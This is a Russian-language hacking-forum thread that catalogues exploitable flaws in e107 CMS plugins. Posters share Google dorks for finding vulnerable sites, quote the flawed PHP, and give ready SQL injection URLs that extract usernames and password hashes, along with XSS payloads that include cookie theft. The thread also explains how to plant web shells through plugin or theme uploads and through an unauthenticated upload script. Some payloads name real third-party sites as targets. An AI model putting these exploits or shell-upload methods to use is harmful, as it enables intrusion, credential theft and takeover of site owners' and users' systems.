AutoGallery v3.1_beta [скачано] в гугле: inurl:e107_plugins/autogallery Результаты 1 - 10 из примерно 132 000 путь в информации! http://e107/e107_plugins/autogallery/help.php пути (бес параметров запрос послать!): http://e107/e107_plugins/autogallery/xmlplaylist.php http://e107/e107_plugins/autogallery/editaction.php пассивная XSS e107_plugins/autogallery/arcade.php PHP: .... // Do different things when the flash game gives different requests $sessdo = $_POST['sessdo']; if ($sessdo != '') { // Session start to get the game name - $title $microone = $_POST['microone']; $score = $_POST['score']; $gametime = $_POST['gametime']; // Keep feeding that flash! switch($sessdo) { case 'sessionstart': // Give it some random crap it doesn't really need (the initbar figure and lastid) echo "&connStatus=1&gametime=$gametime&initbar=6Z4&lastid=6&val=x"; exit; break; // Give it permission for... no apparent reason case 'permrequest': // Notice $microone = $score; -__VERY IMPORTANT__ $microone = $score; echo "&validate=1µone=$microone"; exit; break; ... target: Result (шлем POST!): sessdo=sessionstart gametime=<script>alert(/XSS/)</script> или sessdo=permrequest microone=<script>alert(/XSS/)</script> <form action="http://[host]/[path]/e107_plugins/autogallery/arcade.php" method="POST"> <input type=text name=sessdo value=sessionstart><br> <input type=text name=gametime value='<script>alert(/XSS/)</script>'><br> <input type=submit value=Отправить> </form>
пам aa_meetings v1.1 [скачать] SQL inj /e107_plugins/aa_meetings/geocode.php PHP: ...// Select all the rows in the markers table $query = "SELECT * FROM ".MPREFIX."aam_meetings WHERE 1"; if ($_GET['MeetingID']) $query .= " and MeetingID=".$_GET['MeetingID']; else $query .= " and (Lat is null or Lng is null)"; $result = mysql_query($query); if (!$result) { die("Invalid query: " . mysql_error()); }... Result: http://ovdpohe.sk/e107_plugins/aa_meetings/geocode.php?MeetingID=1+or+%28select+1+from+%28select%20count%280%29%20from%20e107_user%20group%20by%20concat%28user_password%20,0x3a,floor%28rand%280%29*2%29%29%29x%29--
Roster by Carl Taylor Version 2.0 гугл- inurl:/e107_plugins/roster Blind SQL inj [path]/e107_plugins/roster/userinfo.php PHP: ... //html file require_once("html/roster_userinfo.php"); $html = new userinfo_html; switch($_GET['action']){ default: $text = $html->uinfo_show($_GET['m_id']); }... [path]/e107_plugins/roster/html/roster_userinfo.php PHP: ... Class userinfo_html { function uinfo_show($m_id) { global $sql; // get the member $member_q = $sql->db_Select("roster_members", "*", "roster_member_id='".$m_id."'"); $member_a = $sql->db_Fetch(MYSQL_ASSOC); $rank = explode(",", $member_a['roster_member_rank']); $enlisted = date("dMY", $member_a['roster_member_enlisted']); $enlisted = strtoupper($enlisted); $patterns[0] = "/JUN/"; $patterns[1] = "/JUL/";... [path]/e107_handlers/mysql.class.php PHP: ...function db_Select($table, $fields = '*', $arg = '', $mode = 'default', $debug = FALSE, $log_type = '', $log_remark = '') { global $db_mySQLQueryCount; $table = $this->db_IsLang($table); $this->mySQLcurTable = $table; if ($arg != '' && $mode == 'default') { if ($this->mySQLresult = $this->db_Query('SELECT '.$fields.' FROM '.MPREFIX.$table.' WHERE '.$arg, NULL, 'db_Select', $debug, $log_type, $log_remark)) { $this->dbError('dbQuery'); return $this->db_Rows(); } else { $this->dbError("db_Select (SELECT $fields FROM ".MPREFIX."{$table} WHERE {$arg})"); return FALSE; } } elseif ($arg != '' && $mode != 'default') { if ($this->mySQLresult = $this->db_Query('SELECT '.$fields.' FROM '.MPREFIX.$table.' '.$arg, NULL, 'db_Select', $debug, $log_type, $log_remark)) { $this->dbError('dbQuery'); return $this->db_Rows(); } else { $this->dbError("db_Select (SELECT {$fields} FROM ".MPREFIX."{$table} {$arg})"); return FALSE; } } else { if ($this->mySQLresult = $this->db_Query('SELECT '.$fields.' FROM '.MPREFIX.$table, NULL, 'db_Select', $debug, $log_type, $log_remark)) { $this->dbError('dbQuery'); return $this->db_Rows(); } else { $this->dbError("db_Select (SELECT {$fields} FROM ".MPREFIX."{$table})"); return FALSE; } } }... PHP: ...function dbError($from) { if ($error_message = @mysql_error()) { if ($this->mySQLerror == TRUE) { message_handler('ADMIN_MESSAGE', '<b>mySQL Error!</b> Function: '.$from.'. ['.@mysql_errno().' - '.$error_message.']', __LINE__, __FILE__); return $error_message; } } }... К сожелению ошибки от СУБД отключены: PHP: function db_Connect($mySQLserver, $mySQLuser,$mySQLpassword, $mySQLdefaultdb) ... $this->mySQLerror = FALSE; ... Result: http://[host]/[path]/e107_plugins/roster/userinfo.php?m_id=1'+and+substring(version(),1,1)=5--+ Контент выводится! http://[host]/[path]/e107_plugins/roster/userinfo.php?m_id=1'+and+substring(version(),1,1)=4--+ Контент не выводится! Условие: mg=off roster_sql.php - в скрипте структура єтого плагина бес дескрипторов! путь - http://[host]/[path]/e107_plugins/roster/log/userclass2.php
Я обписался ): В посте выше не блинд, а иньекция c принтабельными! SQL inj гугл inurl:/e107_plugins/roster Условие: mg=off А вот и доказательства: http://www.10thsfg.org/e107_plugins/roster/userinfo.php?m_id=-5%27+union+select+1,2,3,4,5,6,7,8,user_password%20,10,11,12,13,14,15,16,user_loginname,18+from+e107_user--+
1 Social Shop v1.1 by eleljrk cкачать гугл inurl:e107_plugins/social_shop/ SQL inj [path]/e107_plugins/social_shop/shop.php PHP: ...elseif($_GET['product']) { $storedb->db_Select("ss_products","*", "product_id='".$_GET['product']."'"); while($store_row = $storedb -> db_Fetch()) { if($store_row['product_approve'] == 0 && !ADMIN) { $ns->tablerender(SS_ERROR , "<div align='center'>".SS_ERRORMASSAGE."<a href='".e_SELF."?page=home'>".$pref['ss_store_name']."</a></div>".$credits); require_once(FOOTERF); exit; } else { $store_user = get_user_data($store_row['product_releaser']); $filesize = round((filesize("store/".$store_row['product_product']) / 1024)); $product_description = str_replace("\n" ,"<br />" , $store_row['product_description']); $store... Результат: http://[host]/[path]/e107_plugins/social_shop/shop.php?product=-1'+union+select+1,concat_ws(0x3a,user_loginname,user_password),3,4,5,6,7,8,9,10,11,12,13,14+from+e107_user--+ Условие: mg=off
Survey_46.zip v0.47 by yvalni скачать гугл- inurl:e107_plugins/survey Результаты 1 - 10 из примерно 7 430 SQL inj [path]/e107_plugins/survey/survey.php PHP: ...if($_POST['submit']){ $cnv = new convert; $mailto_addresses = ""; $submit_time = time(); $mailtext = LAN_SUR42.": ".$cnv -> convert_date($submit_time,"long")."\n\n"; $sql -> db_Select("survey","*","survey_id='{$_POST['survey_id']}' "); if($row = $sql -> db_Fetch()){ extract($row); } if($survey_class != e_UC_PUBLIC && $survey_once){ if(already_voted($survey_user)){ $ns -> tablerender("Error - {$survey_name}",LAN_SUR2); require_once(FOOTERF); exit; } }... Самое интересное что survey_id можно и не знать, данные вместе с ошибкой вылазят (есть принтабельное поле!) Результат: <form action="http://[host]/[path]/e107_plugins/survey/survey.php" method=post> <input type=text name=survey_id value="-2' union select 1,concat_ws(0x3a,user_loginname,user_password ),3,4,5,6,7,8,9,10,11,12,13,14 from e107_user limit 0,1-- "> <input type=submit name=submit> </form> Условие: mg=off
Registration v0.9 by holiday скачать SQL inj в order by (есть вывод от СУБД!) гугл- inurl:e107_plugins/registration [path]/e107_plugins/registration/playerlist.php PHP: require_once("../../class2.php"); //@include_once e_PLUGIN.'registration/languages/'.e_LANGUAGE.'.php'; @include_once e_PLUGIN.'registration/languages/Deutsch.php'; require_once("cRegistration.php"); require_once(HEADERF); $title=sprintf("%s - %s",REG_MAIN_2, cTournament::getInstance()->getActualTournament() ); $ns->tablerender($title, cRegistration::getInstance()->showRegisteredUser($_REQUEST['order'])); require_once(FOOTERF); [path]/e107_plugins/registration/Cregistration.php PHP: ....public function showRegisteredUser($order=""){ $config = cConfig::getInstance()->getConfiguration(); $data=$this->getAllParcipitants($order); $border=sprintf("border:0;border-bottom: #444 1px solid;"); $padding1=sprintf("padding-right: 1em"); $table.=sprintf("<table align=left style='width:95%%;margin-left:10px;border-collapse:collapse;%s; background:none;'>",$border); $table.=sprintf("<tr>");... PHP: ...protected function getAllParcipitants($order){ try { global $tp, $sql; //reihenfolge wird immer durch Name, Vornamen ergдnzt if(empty($order))$order="reg_name, reg_vorname"; else $order.=', reg_name, reg_vorname'; $data=array(); $this->debug("DB select {$this->table}"); $tid=cTournament::getInstance()->getActualTournamentId(); $result=$sql->db_Select("teilnehmer", "*" , "WHERE reg_tournamentId=$tid ORDER BY $order ", ""); if(!$result) { $error=sprintf("DB Error %s: %s", mysql_errno(), mysql_error()); if(mysql_errno()>0) throw new Exception ($error); $this->debug("Kein Datenbankeintrag gefunden"); } //$teilnehmer=array(); while($row = $sql->db_Fetch()) { ... Результат: http://[host]/[path]/e107_plugins/registration/playerlist.php?order=1,(select 1 from (select count(0),concat_ws(0x3a,(select user_loginname from e107_user limit 0,1),(select user_password from e107_user limit 0,1),floor(rand(0)*2)) from (select 1 union select 2 union select 3)x group by 2)a) ps 1) лучше постом крутить! 2) http://[host]/[path]/e107_plugins/registration_sql.php - структура плагина!
Map Me! v1.3 by rickey911 скачать SQL inj гугл- inurl:/e107_plugins/mapme [path]/e107_plugins/mapme/mapmejs.php PHP: ...require_once("../../class2.php"); // Get language file (assume that the English language file is always present) $lan_file = e_PLUGIN."mapme/languages/".e_LANGUAGE.".php"; include_lan($lan_file); header("Content-type: application/x-javascript"); global $pref, $user; $uid = $_GET['u']; $sql->mySQLresult = @mysql_query("SELECT ".MPREFIX."gmarkers.loc, ".MPREFIX."gmarkers.lat, ".MPREFIX."gmarkers.lng, ".MPREFIX."user.user_name, ".MPREFIX."user.user_image FROM `".MPREFIX."gmarkers`, ".MPREFIX."user where ".MPREFIX."gmarkers.user_id = ".$uid." and ".MPREFIX."gmarkers.user_id = ".MPREFIX."user.user_id"); $rows=$sql->db_Rows(); if($rows){ $row = $sql->db_Fetch(); if($row['user_image']){ require_once(e_HANDLER."avatar_handler.php"); $uimage = "<img src='".avatar($row['user_image'])."' alt='".$row['user_name']."' style='text-align:middle' />"; } else{ $uimage = "<img src='".e_PLUGIN."mapme/images/noavatar.gif' alt='".$row['user_name']."' style='text-align:middle' />"; } $html = "\"<div style='width:250px;'><div style='float:left; text-align:left;'>".$uimage."</div><div style='float:left; text-align:left;'><a href='".e_BASE."user.php?id.".$uid."' title='".$row['user_name']."'><b>".$row['user_name']."</b></a><br>".MAPME_JS_001." ".$row['user_name']." ".MAPME_JS_002." ".$row['loc']."."; if($uid==USERID){ $html .="<br><br><span class='smalltext'><a href='".e_PLUGIN_ABS."mapme/mapconfig.php'>".MAPME_JS_003."</a></span>"; // bugfix by nlstart } ... Результат и никаких условий: http://[host]/[path]/e107_plugins/mapme/mapmejs.php?u=-1+union+select+1,2,3,concat_ws(0x3a,user_loginname,user_password),5+from+e107_user--+ ps скоро буду ескплоиты на перл писать когда вылечусь ):
Tabbed Menu v2.0 by KVN скачать inurl:e107_plugins/tabbed_menu пасивная XSS Code: http://[host]/[path]/e107_plugins/tabbed_menu/ajaxhandler.php?target=<script>alert(123)</script> [path]/e107_plugins/tabbed_menu/ajaxhandler.php PHP: ...}else{ $ajax_response = "<menu_name>{$_GET['target']}</menu_name><source_id>$ajax_source</source_id><arg>$ajax_arg</arg> <b>No Data Available</b>"; } echo $ajax_response; путь: Code: http://[host]/[path]/e107_plugins/tabbed_menu/ajaxhandler.php?source=1
AACGC BFBC2 Stats v1.3 by ~M@CH!N3~ скачать 2-d order inj гугл- inurl:e107_plugins/aacgc_bfbcstats [path]/e107_plugins/aacgc_bfbcstats/Member_Details.php PHP: ...require_once("../../class2.php"); require_once(HEADERF); if (e_QUERY) { $tmp = explode('.', e_QUERY); $action = $tmp[0]; $sub_action = $tmp[1]; $id = $tmp[2]; unset($tmp); } if ($pref['bfbc_enable_gold'] == "1"){$gold_obj = new gold();} //--------------------------------------------------------------- $title .= "Battlefield Bad Company 2 Member Details"; //--------------------------------------------------------------- $sql ->db_Select("user_extended", "*", "WHERE user_extended_id=$sub_action",""); $row = $sql->db_Fetch(); $sql2 ->db_Select("user", "*", "WHERE user_id='".$row['user_extended_id']."'",""); $row2 = $sql2->db_Fetch(); if ($pref['bfbc_enable_gold'] == "1"){ $username = "".$gold_obj->show_orb($row2['user_id'])."";} else {$username = "".$row2['user_name']."";} if ($pref['bfbc_enable_avatar'] == "1"){ if ($row2['user_image'] == "") {$avatar = "";} else {$useravatar = $row2[user_image]; require_once(e_HANDLER."avatar_handler.php"); $useravatar = avatar($useravatar); $avatar = "<img src='".$useravatar."' width=".$pref['bfbc_avatar_size']."px></img>";}} $bfbcname = $row['user_bfbc2']; //------------------------------------------------------ $text .= "<table style='width:100%' class=''>"; $text .= " <tr> <td bgcolor='#000000'><center><img src='".e_PLUGIN."aacgc_bfbcstats/images/bfbc2banner.jpg'></img></center></td> </tr>";... Результат: хексим: Code: ' union select 1,concat_ws(user_loginname,':',user_password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 from e107_user limit 0,1-- Code: http://host//path/e107_plugins/aacgc_bfbcstats/Member_Details.php?.1%20and%200%20union%20select%200x2720756e696f6e2073656c65637420312c636f6e6361745f777328757365725f6c6f67696e6e616d652c273a272c757365725f70617373776f7264292c332c342c352c362c372c382c392c31302c31312c31322c31332c31342c31352c31362c31372c31382c31392c32302c32312c32322c32332c32342c32352c32362c32372c32382c32392c33302c33312066726f6d20653130375f75736572206c696d697420302c312d2d20,2 Пути: http://[host]/[path]/e107_plugins/aacgc_bfbcstats/kits.php http://[host]/[path]/e107_plugins/aacgc_bfbcstats/general.php http://[host]/[path]/e107_plugins/aacgc_bfbcstats/teams.php http://[host]/[path]/e107_plugins/aacgc_bfbcstats/BFBC2_menu.php ps - "+" заменяем на " "; - незабываем за шелл через 2-ой запрос.
1 Advanced Ranking and Medal System v1.5 by MikeNL 21:44 31-Jan-10 скачать SQL inj гугл- inurl:e107_plugins/advmedsys [path]/e107_plugins/advmedsys/advmedsys_view.php PHP: ...require_once("../../class2.php"); require_once(HEADERF); //-----------------------------------------------------------------------------------------------------------+ //-----------------------------------------------------------------------------------------------------------+ if (e_QUERY) { $tmp = explode('.', e_QUERY); $action = $tmp[0]; $sub_action = $tmp[1]; $id = $tmp[2]; unset($tmp); } $lan_file = e_PLUGIN."advmedsys/languages/".e_LANGUAGE.".php"; require_once(file_exists($lan_file) ? $lan_file : e_PLUGIN."advmedsys/languages/English.php"); //-----------------------------------------------------------------------------------------------------------+ if ($action == "main" || $action == "") {... PHP: ...if ($action == "det") { $width = "width:100%"; $text .= " <div style='text-align:center'> <br><a href='advmedsys_view.php'><center>[ ".AMS_VIEW_S9." ]</center></a><br> <table style='".$width."' class='fborder' cellspacing='0' cellpadding='0'> <tr> <td style='width:80px' class='forumheader3'><center>".AMS_VIEW_S1."</td> <td style='width:100%' class='forumheader3'>".AMS_VIEW_S2."</td> </tr>"; $sql->db_Select("advmedsys_medals", "*", "WHERE medal_id = $sub_action",""); $row = $sql->db_Fetch(); $text .= " <tr> <td style='width:80px' class='forumheader3'><img src='medalimg/".$row['medal_pic']."' alt = '".AMS_VIEW_S1."'></img></td> <td style='width:100%; vertical-align:middle' class='forumheader3'>".$row['medal_name']."</td> </tr> </table> <br></br>... Далее по коду 2-d order inj. Результат: http://[host]/[path]/e107_plugins/advmedsys/advmedsys_view.php?det.1 and 0 union select 1,2,3,concat_ws(0x3a,user_loginname,user_password) from e107_user http://[host]/[path]/e107_plugins/advmedsys/advmedsys_view.php?det.1 and 0 union select 1,concat_ws(0x3a,user_loginname,user_password),3,4 from e107_user limit 0,1 пример: http://www.truescap.com/e107_plugins/advmedsys/advmedsys_view.php?det.1/*! and 0 union select 1,2,3,concat_ws(0x3a,user_loginname,user_password) from e107_user*/
1 Как лить шелл через админку. Способ 1. Если в e107_admin/ есть filetypes.php, то можно устанавливать плагины! По умолчанию этот файл называеться filetypes_.php, тоесть лить неззя. Тогда такой massage: An error has occurred, unable to un-archive the file PCLZIP extract error: 'PCLZIP_ERR_MISSING_FILE (-4)' Но если filetypes.php, то берем madnet шелл (или wso etc чтоб никого не обидеть! ^_^), выкачиваем плагин (любой!), распаковываем, пыхаем туда наш шелл, архивируем, ну и устанавливаем плагин. Пробывал на Spam Cleaner v1.0 by martinj - размер 2.7 кб. [скачан отсюдо] и если ниче не блочит типо mod_security http://[host]/[path]/e107_plugins/spamcleaner/our_shell.php Способ 2. Такой же, только через установку новой темы в админке Theme Manager -> Upload Theme. http://[host]/[path]/e107_themes/mew_team/our_shell.php ps 1. Проверял на последней сборке! 2. Делимся способами заливки! ): up Способ 3. Через бажный плагин если таковой имееться. Как лить шелл (не имея прав админа!). Способ 1 Бажный плагин.
1234567 ех,вкусная бреш! плагин за 2009 год, скачан отсюдо гугл- inurl:e107_plugins/radio_plan/ http://[host]/[path]/e107_plugins/radio_plan/admin/upload.php PHP: ...include "../configuration.php"; include "../includes/functions.inc.php"; if($_FILES){ if(move_uploaded_file($_FILES['pic']['tmp_name'], '../images/' . get('target') . '/' . $_FILES['pic']['name'])){ echo "Upload erfolgreich"; $image_path = '../images/' . get('target') . '/'; // Bilder in der Grosse anpassen //$act_image = $_FILES['pic']['name']; // $image_parts = explode('.', $act_image, -1); // $image_name = $image_parts[0]; // $image_parts = explode('.', $act_image); // $image_ext = array_pop($image_parts); // // $full_image = $image_name . '.full.' . $image_ext; // $thumb_image = $image_name . '.thumb.' . $image_ext; // // image_resize($image_path . $act_image, $image_full_width, $image_full_height, $image_path . $full_image, $image_ext); // image_resize($image_path . $act_image, $image_thumb_width, $image_thumb_height, $image_path . $thumb_image, $image_ext); // // unlink($image_path . $act_image); } else echo "Upload fehlgeschlagen";... [path]/e107_plugins/radio_plan/includes/functions.inc.php PHP: ...function get($var, $flag = ''){ $let_get = TRUE; if(strpos("/POST", $var) === FALSE){ $let_get = FALSE; $var = ereg_replace("/POST", "", $var); } if(isset($_POST[$var])) return $_POST[$var]; else if(isset($_GET[$var]) && $let_get == FALSE) return $_GET[$var]; else if(isset($_FILES[$var][$flag]) && $let_get == FALSE) return $_FILES[$var][$flag]; else return FALSE; }... Когда лил шелл на локале - была ошибка, но понял что у меня PHP Version 5.3.1 И это связано с этим: заменил на: PHP: $var = preg_replace("@/POST@", "", $var); Уря ): http://[host]/[path]/e107_plugins/radio_plan/images/our_sell.php ps на целевом ниче не надо менять. забыл, пост слать не надо, там сразу форма с загрузкой файла выводиться когда обращаемся к скрипту upload.php ):
Alternate Profiles выкачал отсюдо гугл- inurl:e107_plugins/alternate_profiles ./e107_plugins/alternate_profiles/db_upgrade.php PHP: ... if(isset($_GET['con'])) { $start = $_GET['start']; $end = $_GET['end']; $query = mysql_query("SELECT * FROM ".MPREFIX."alternate_profiles LIMIT $start,$end"); $rows = mysql_num_rows($query); if (isset($_GET['count'])) { $count = $_GET['count']; $first = $_GET['start'] - 2; echo "Users #".$first." to #".$count." have been updated.<br/>"; } else {... PHP: ...$split = explode("[||]",$row['user_custompage']); if ($split[0] == "0019283") { $array = Array(); $array['Mood'] = $split[1]; $array['Status'] = $split[2]; $array['Orientation'] = $split[3]; $array['Hometown'] = $split[4]; $array['Ethnicity'] = $split[5]; $array['Occupation'] = $split[6]; $array['Music'] = $split[7]; $array['Films/Television'] = $split[8]; $array['Favourite_Books'] = $split[9]; $array['aboutme'] = $split[10]; $db = serialize($array); mysql_query("UPDATE ".MPREFIX."alternate_profiles SET user_custompage='".$db."', user_simple='1' WHERE user_id=".$row['user_id']." "); unset($array); $count++; echo "Updated user #".$row['user_id']."<br/>"; } else { mysql_query("UPDATE ".MPREFIX."alternate_profiles SET user_simple='0' WHERE user_id=".$row['user_id']." "); }... Результат: passive XSS http://[host]/[path]/e107_plugins/alternate_profiles/db_upgrade.php?con&start=0&end=1&count=<script>alert(123)</script> blind SQL inj чтоб крутить в результат первого запроса надо впихнуть:0019283[||], ну понятно лучше захексить, чтоб обойти кавычки ): Пусть 5 вертка http://[host]/[path]/e107_plugins/alternate_profiles/db_upgrade.php?con&start=0&end=1 union select 1,0x303031393238335b7c7c5d27,3,4,5,6,7,8,9,10,11 from (select 1 union select 2 union select 3)x where substring(version(),1,1)=5 A total of 1 profiles have been upgraded - true http://[host]/[path]/e107_plugins/alternate_profiles/db_upgrade.php?con&start=0&end=1 union select 1,0x303031393238335b7c7c5d27,3,4,5,6,7,8,9,10,11 from (select 1 union select 2 union select 3)x where substring(version(),1,1)=4 A total of 0 profiles have been upgraded - false плюс - никаких условий
гугл- inurl:e107_plugins/rank_system/recommend.php target: http://[host]/[path]/e107_plugins/rank_system/recommend.php passive XSS /e107_plugins/rank_system/recommend.php PHP: ...$recomm = new recommend(); if (isset($_POST['nextstep']) ) { $recomm_action = $_POST['recomm_action']; } else { $recomm_action = ""; }... PHP: ....else if ($recomm_action == 'submit') { $type = intval($_POST['recomm_type']); $target = intval($_POST['recomm_target']); $t_name = $_POST['t_name']; $r_for = intval($_POST['recomm_for']); $r_remarks = $tp->toDB($_POST['recomm_remarks']); if ($recomm->submitRecomm($target, $type, $r_for, $r_remarks)) { $msg = RANKS_RM_11; } else { $msg = RANKS_RM_12; } $rank_text .= ' <table class="rsborder" style="' . USER_WIDTH . '"> <tr> <td class="rscaption" style="text-align:left">' . RANKS_RM_01 . ' [' . $t_name .']</td>... Результат (установить постом!): nextstep = любое зн. recomm_action=submit t_name= xss ps сработает тока у авторизированого!
Уязвимости e107 как бы не место в паблике... дорк:intext:This site is powered by e107e107 Version 0.7.20 Passive XSS Vuln file /e107_files/thumb.php PHP: require_once("../class2.php"); require_once(e_HANDLER."resize_handler.php"); if (e_QUERY) { $tmp = explode('+',rawurldecode(e_QUERY)); if(strpos($tmp[0], '/') === 0 || strpos($tmp[0], ":") >= 1) { $source = $tmp[0]; // Full path to image specified } else { $source = "../".str_replace('../','',$tmp[0]); } if (!$source) { echo "No image name.<br />"; exit; } $newsize = intval($tmp[1]); if (($newsize < 5) || ($newsize > 4000)) // Pretty generous limits { echo "Bad image size: {$newsize}<br />"; exit; } $opts = varset($tmp[2],'upsize'); if(!resize_image($source, 'stdout', $newsize, $opts)) { echo "Couldn't find: {$source}<br />"; } } Exploit: http://[host]/[path]e107_files/thumb.php?1e107_files/thumb.php?<script>alert(123)</script>%2b5 ps Проверил на самой последней 0.7.21 Ковыряем двиг дальше у кого есть желание!
Подскажите уязвимости в ядре 0.7.17, с этой версии были выпущены заплатки на какие то уязвимости - (хз на какие) Через плагины поломать невозможно, т.к. из плагинов юзается лишь guestbook.
eBattles eBattles Version 0.7.229 (другие версии не тестил) Зависимости нету Пассивная XSS \e107_v0.7.16_full\e107_plugins\ebattles\clanmanage.php PHP: /* Clan Name */ $clan_id = $_GET['clanid']; if (!$clan_id) { header("Location: ./clans.php"); exit(); } else { Result: http://localhost/e107_v0.7.16_full/e107_plugins/ebattles/clanmanage.php?clanid=1"><script>alert(document.cookie)</script> \e107_v0.7.16_full\e107_plugins\ebattles\eventinfo.php PHP: $event_id = $_GET['eventid']; if (!$event_id) { header("Location: ./events.php"); exit(); } else { Result: http://localhost/e107_v0.7.16_full/e107_plugins/ebattles/eventinfo.php?eventid=1"><script>alert(document.cookie)</script> Off Site: Code: http://ebattles.freehostia.com/e107_plugins/ebattles/eventinfo.php?eventid=31"><script>alert(document.cookie)</script>
MyBlogs Version 0.72 Пассивная XSS \e107_plugins\myblog_menu\myblog.php Result: http://localhost/e107_plugins/myblog_menu/myblog.php?a=profile&s=newpost Text: Caption: Tags: Активная xss site.ru/e107_plugins/myblog_menu/myblog.php?a=tag Search on tagwords:"><script>alert()</script>
Library Module v1.1 Дорк такой:e107_plugins/library не прикрыто штаксесом: http://[host]/[path]/e107_plugins/library/ раскрытие путей: http://[host]/[path]//e107_plugins/library/search.php http://[host]/[path]/e107_plugins/library/help.php http://[host]/[path]/e107_plugins/library/admin_menu.php в последнем admin_menu.php варнинг на require, и там же можно сделать редирект --> только бестолку. В library.php возможно есть иньекция при mg=off. нашел pxss e107_plugins/library/admin_menu.php PHP: $menutitle = "Virtual Library"; $butname[] = "Main Library Page"; // Admin Menu Button Name $butlink[] = "library_conf.php"; // Admin Menu Button Link. for ($i=0; $i<count($butname); $i++) { $option = "option_".$i; if(IsSet($_POST[$option])){ $link = $butlink[$i]; header("location: $link"); exit; } } /*...*/ HTML: <form action="http://e107_0.7.21_full/e107_plugins/library/admin_menu.php?butlink[]=data:text/html;base64,PHNjcmlwdD5hbGVydCgxMjMpPC9zY3JpcHQ%2B" method=post> <input name="option_0" type="hidden" value="pew"> <input type='submit'> </form> ну когда rg=on ну а что я сделаю => этот плагин древний, кажетцо с 2005. вот примерчик сразу первый. <form action="http://buddhism.am/e107/e107_plugins/library/admin_menu.php?butlink[]=data:text/html;base64,PHNjcmlwdD5hbGVydCgxMjMpPC9zY3JpcHQ%2B" method=post> <input name="option_0" type="hidden" value="pew"> <input type='submit'> </form>
